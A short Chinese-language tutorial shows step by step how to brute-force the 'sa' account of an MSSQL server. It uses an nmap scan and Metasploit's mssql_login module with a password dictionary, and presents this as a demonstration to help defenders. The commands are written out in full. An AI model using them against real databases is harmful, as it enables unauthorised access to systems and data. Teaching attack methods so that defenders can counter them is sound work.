聊安全,简单讲述一个MSSQL 暴力破击攻击,也为做安全的提供点简单的攻防思路。
很多时候攻击者混入内网,第一步就是扫描有价值的信息,我们这里用常用kali,
通过kali
自带msf
平台对自己的MSSQL
数据库进行暴力破解攻击,最终获取真实密码。第一步: nmap 扫描可用信息
Nmap扫描有使用1433 端口的主机,猜测是MSSQL,开始针对性尝试攻击
第二步:查找MSSQL 可用攻击工具
search mssql
使用MSSQL_login 攻击
use auxiliary/scanner/mssql/mssql_login
第三步:
showoption 查看参数,填写必填项目,增加字典
set rhosts 10.10.100.139 配置目标攻击主机IPset threads 10 设置扫描线程(加速)set PASS_FILE /home/pass1.txt 配置使用字典路径set USERNAME sa 配置常用MSSQL 账号
因为一般情况下MSSQL 默认账户都是SA ,所以配置上去,主机IP 已经扫描出来了
第四步: run
当然这里有人说了,这里密码破解是不是太容易了,这里只是演示效果啊,还是很多弱密码的情况,可以用字典生成器生成X位的字典;
懂套路才懂防护,希望对大家有所帮助。